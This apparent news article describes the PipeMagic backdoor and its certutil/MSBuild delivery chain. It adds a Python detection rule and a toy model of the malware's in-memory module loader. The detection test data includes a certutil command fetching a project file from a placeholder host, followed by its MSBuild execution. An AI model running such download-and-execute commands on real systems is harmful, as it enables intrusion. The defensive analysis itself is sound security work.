PipeMagic is a modular, memory-resident backdoor used in targeted intrusions by Storm-2460, a financially motivated threat actor. It has been deployed against organizations in the IT and financial sectors through a trojanized build of a legitimate open-source ChatGPT Desktop application.
The backdoor and the modules it loads are held only in memory, which sidesteps detection that keys on file writes; the delivery stages that bring it onto the host do still touch disk, as described below.
CVE-2025-29824, a zero-day elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver, is exploited after the operators already have a foothold: it raises the malware's privileges to SYSTEM rather than providing initial access.
Once active, PipeMagic sets up encrypted communication, using named pipes for local coordination between its components and a TCP connection (a WebSocket, described below) for external command-and-control. Additional components are loaded into memory on demand and tracked in doubly linked lists, which record which modules are staged for delivery and which are queued for execution.
In several campaigns the backdoor has been used to stage RansomExx ransomware after credential harvesting and lateral movement.
Why It Matters: PipeMagic shows how a threat can bypass enterprise defenses that key on file activity or application-control policy. It keeps its modules in memory and arrives through software and tools that are already trusted, so it avoids the points where most detection tooling looks. Many environments are not instrumented to observe what happens inside process memory or over internal channels such as named pipes. PipeMagic exploits that gap, particularly in environments built around remote access and cloud services: those conditions favor scale and speed, but they often reduce visibility, letting a threat like PipeMagic remain active without being detected.
- Runs in Memory with Modular Control: PipeMagic's own components are never written to disk; each is loaded directly into memory and stays there while active. The malware organizes those components in doubly linked lists that track which modules are ready to run, which handle communication, and which hold additional payloads. Modules can be added or unlinked at runtime, so the operator can adjust functionality to the environment without restarting the malware or leaving file-based evidence behind.
- Delivered Through Trusted Software and Tools: The initial infection uses a build of the open-source ChatGPT Desktop application that has been altered to carry a malicious payload. Once installed, the malware uses certutil, a standard Windows tool, to download a file hosted on a previously compromised legitimate website. That file is a malicious MSBuild project file, which is then executed with MSBuild, another signed Windows utility; MSBuild project files can contain inline code tasks, which is what lets a build tool serve as a loader. Both binaries are commonly allowed in enterprise environments, so this stage is less likely to be flagged early in the intrusion.
- Escalates Privileges Using a CLFS Vulnerability: Once running, PipeMagic exploits CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) kernel driver, to move from the installing user's privileges to SYSTEM, giving it full control of the host. Because the flaw sits in a kernel driver that few monitoring tools instrument, the exploit does not trigger the alerts typically associated with user-mode privilege escalation. Once elevated, the malware can carry out its remaining tasks without additional tooling or user interaction. Hosts patched for CVE-2025-29824 are not exposed to this step, so patch state is the first thing to verify.
- C2 Traffic Managed by a Separate Module: Rather than contacting the operator's server from the main backdoor, PipeMagic loads a dedicated network module that handles all external communication. This module establishes a WebSocket connection whose handshake resembles ordinary browser traffic, reducing the chance that network security tools flag it. The connection's configuration, including the server address and a limit on connection attempts, is held only in memory. Once connected, the module sends system details and waits for instructions.
- Payloads Loaded and Controlled Remotely: New modules arrive over the active connection, are validated with a hash check, decrypted, and stored in memory. They can perform a range of functions, including system scanning, process enumeration, credential theft, and ransomware deployment. The operator issues commands naming which module to run and with what parameters. Each command is processed in memory, without spawning visible processes or writing to disk, which lets PipeMagic change behavior quickly and avoid the patterns that would trigger detection. Note that a hash check on a received module proves only that it arrived intact, not who sent it: it is an integrity check, not authentication.
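The certutil/MSBuild delivery chain described above is the stage of this intrusion that does leave host telemetry, so here is an added detection example in Python (not code from the page, from Microsoft, or from any vendor product): one rule flags certutil being used to fetch a URL, a second flags MSBuild executing a project file from a user-writable location, and the two are escalated when they occur on the same host within a short window. The events, hostnames, paths and URL are constructed placeholders, and the list of user-writable roots and the ten-minute window are assumptions to tune per environment.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 records.
# Hostnames, paths and the URL are placeholders, not indicators from any report.
EVENTS = [
    {"ts": "2025-04-01T10:00:05", "host": "WS01",
     "image": r"C:\Users\alice\AppData\Local\Programs\chatgpt-desktop\ChatGPT.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Programs\chatgpt-desktop\ChatGPT.exe"'},
    {"ts": "2025-04-01T10:00:09", "host": "WS01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://compromised-site.example/u/p.xml C:\ProgramData\p.xml"},
    {"ts": "2025-04-01T10:00:41", "host": "WS01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\ProgramData\p.xml"},
    {"ts": "2025-04-01T10:05:00", "host": "DEV07",   # benign developer build
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.sln /t:Build"},
    {"ts": "2025-04-01T10:06:00", "host": "WS02",    # benign certutil use
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -dump C:\certs\root.cer"},
    {"ts": "2025-04-01T10:07:00", "host": "WS03",    # suspicious on its own, but no download seen
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\build.xml"},
]

# certutil fetching a URL into its cache (the -urlcache download idiom)
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)
# Assumed list of user-writable roots a legitimate build would not normally run from; tune per estate.
USER_WRITABLE = ("\\programdata\\", "\\users\\public\\", "\\appdata\\local\\temp\\",
                 "\\windows\\temp\\", "\\windows\\tasks\\")
WINDOW = timedelta(minutes=10)   # assumed correlation window


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_certutil_download(ev):
    return basename(ev["image"]) == "certutil.exe" and CERTUTIL_DOWNLOAD.search(ev["cmdline"]) is not None


def is_msbuild_from_user_writable(ev):
    if basename(ev["image"]) != "msbuild.exe":
        return False
    cmd = ev["cmdline"].lower()
    return any(root in cmd for root in USER_WRITABLE)


def detect(events):
    """Emit alerts; an MSBuild hit preceded on the same host by a certutil download within WINDOW
    is escalated to high severity because the pair matches the delivery chain."""
    alerts, downloads = [], []          # downloads: (host, time) of certutil fetches seen so far
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if is_certutil_download(ev):
            downloads.append((ev["host"], t))
            alerts.append({"host": ev["host"], "ts": ev["ts"], "severity": "medium",
                           "rule": "certutil_download"})
        elif is_msbuild_from_user_writable(ev):
            chained = any(h == ev["host"] and timedelta(0) <= t - dt <= WINDOW for h, dt in downloads)
            alerts.append({"host": ev["host"], "ts": ev["ts"],
                           "severity": "high" if chained else "medium",
                           "rule": "msbuild_chained_after_certutil" if chained
                                   else "msbuild_user_writable_project"})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Run against the constructed events, the rule produces a medium alert for the certutil fetch on WS01, a high alert for the MSBuild execution that follows it 32 seconds later on the same host, and a medium alert for the lone MSBuild run on WS03; the developer build and the certificate dump produce nothing. Both binaries are legitimate, so the value is in the combination and the location of the project file rather than in either process on its own.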
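To make the module handling described in the last two items concrete, here is an added Python model of the receive side (not PipeMagic's code and not taken from any published analysis): modules arrive as frames, the hash is checked before decryption, decrypted bodies are held in doubly linked lists, and operator commands move a node between the payload list and the execute list or unlink it at runtime. The frame layout, the choice of RC4 and SHA-256, and the JSON module descriptors are assumptions made for this example. It also shows the caveat noted above: a tampered frame is rejected by the hash check, but a frame built by a third party with the same layout is accepted, because a plain hash carries no sender authentication.

```python
import hashlib
import json
import struct

def rc4(key, data):
    """RC4 keystream XOR (symmetric, so one routine encrypts and decrypts); assumed cipher for this example."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

class Node:
    def __init__(self, name, body):
        self.name, self.body, self.prev, self.next = name, body, None, None

class ModuleList:
    """Doubly linked list of in-memory modules; a node moves between lists without being copied."""
    def __init__(self):
        self.head = self.tail = None

    def __iter__(self):
        n = self.head
        while n is not None:
            yield n
            n = n.next

    def append(self, node):
        node.prev, node.next = self.tail, None
        if self.tail is not None:
            self.tail.next = node
        self.head = self.head or node
        self.tail = node

    def unlink(self, node):
        prev, nxt = node.prev, node.next
        if prev is None:
            self.head = nxt
        else:
            prev.next = nxt
        if nxt is None:
            self.tail = prev
        else:
            nxt.prev = prev
        node.prev = node.next = None

    def find(self, name):
        return next((n for n in self if n.name == name), None)

    def names(self):
        return [n.name for n in self]

def pack_module(key, name, plaintext):
    """Assumed frame layout: 2-byte name length | name | SHA-256 of the ciphertext | ciphertext."""
    ct, nb = rc4(key, plaintext), name.encode()
    return struct.pack(">H", len(nb)) + nb + hashlib.sha256(ct).digest() + ct

class Loader:
    def __init__(self, key):
        self.key = key
        self.payloads = ModuleList()   # modules received and decrypted, waiting for a command
        self.ready = ModuleList()      # the module currently selected for execution

    def receive(self, frame):
        """Hash check before decryption: a corrupted frame is dropped, but the check says nothing about the sender."""
        (nlen,) = struct.unpack(">H", frame[:2])
        name = frame[2:2 + nlen].decode()
        digest, ct = frame[2 + nlen:34 + nlen], frame[34 + nlen:]
        if hashlib.sha256(ct).digest() != digest:
            return False
        self.payloads.append(Node(name, rc4(self.key, ct)))
        return True

    def command(self, cmd, name):
        """Operator commands handled in memory: 'run' executes a stored module, 'unload' discards it."""
        node = self.payloads.find(name)
        if node is None:
            return None
        if cmd == "unload":
            self.payloads.unlink(node)
            return True
        if cmd == "run":
            self.payloads.unlink(node)
            self.ready.append(node)
            try:
                spec = json.loads(node.body)   # module bodies are JSON descriptors in this example
                result = f"{name}:{spec['action']}"
            except (ValueError, TypeError, KeyError):
                result = None                  # body did not decrypt to a descriptor (e.g. wrong key)
            self.ready.unlink(node)
            self.payloads.append(node)
            return result
```

Feeding the loader a frame encrypted under a different key passes the hash check and is stored; only the later attempt to run it fails, because the body does not decrypt to a descriptor. A keyed MAC (for example HMAC-SHA-256 under the session key) in place of the bare digest would have rejected that frame at receipt, which is the distinction to keep in mind when an analysis says a payload is "validated with a hash check".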
Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware – The Hacker News